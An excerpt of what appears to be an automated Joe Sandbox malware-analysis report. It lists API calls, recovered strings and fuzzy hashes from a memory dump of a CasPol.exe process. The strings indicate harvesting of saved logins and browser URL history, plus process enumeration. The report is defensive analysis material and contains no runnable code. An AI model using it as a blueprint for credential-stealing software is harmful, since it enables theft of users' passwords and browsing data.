                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1043902810-0
                                                                                                                                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                                                                                                                                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                    • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                    • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                    • API String ID: 3330709923-517860148
                                                                                                                                                                                                                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                    • String ID: logins$null
                                                                                                                                                                                                                    • API String ID: 2148543256-2163367763
                                                                                                                                                                                                                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                    • String ID: ---
                                                                                                                                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                    • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1010922700-0
                                                                                                                                                                                                                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                    • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                    • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                    • free.MSVCRT ref: 00418716
                                                                                                                                                                                                                    • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                                    • free.MSVCRT ref: 00418749
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                                                    • API String ID: 3356672799-1717621600
                                                                                                                                                                                                                    • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW,7570CFBC,?,00413396), ref: 004138ED
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                    • API String ID: 2012295524-70141382
                                                                                                                                                                                                                    • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 00413865
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
